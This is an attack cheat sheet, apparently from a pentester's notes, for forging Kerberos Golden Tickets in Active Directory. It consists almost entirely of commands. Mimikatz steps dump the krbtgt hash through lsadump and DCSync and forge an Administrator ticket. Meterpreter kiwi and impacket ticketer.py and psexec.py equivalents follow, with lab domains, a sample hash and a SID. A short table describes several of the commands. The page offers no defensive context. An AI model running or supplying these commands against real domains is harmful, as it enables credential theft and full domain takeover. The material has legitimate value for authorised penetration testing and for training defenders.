Golden Ticket

GOLDEN TICKET

mimikatz.exe

privilege::debug

lsadump::lsa /inject /name:krbtgt

lsadump::lsa /patch

lsadump::trust /patch

lsadump::dcsync /user:krbtgt

kerberos::purge

kerberos::golden /user:Administrator /domain:domain.local /sid:SID /krbtgt:NTLM HASH /id:500(Admin) or 1103(Service)

kerberos::tgt

10)

misc::cmd

dcsync_ntlm krbtgt

dcsync krbtgt

load kiwi

golden_ticket_create -d DOMAIN_NAME -k NTLM_HASH_OF_KRBTGT -s SID -u Administrator

kerberos_ticket_purge

kerberos_ticket_use /root/Downloads/Administrator.tck

kerberos_ticket_list

./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100

python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus

export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache

python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass

Command

Description

lsadump::dcsync /domain:eagle.local /user:krbtgt

Command used in mimikatz to DCSync and dump the krbtgt password hash

Get-DomainSID

Cmdlet from PowerView used to obtain the SID value of the domain.

golden /domain:eagle.local /sid:<domain sid> /rc4:<rc4 hash> /user:Administrator /id:500 /renewmax:7 /endin:8 /ptt

Command used in mimikatz to forge a golden ticket for the Administrator account and pass the ticket to the current session

klist

Last updated 8 months ago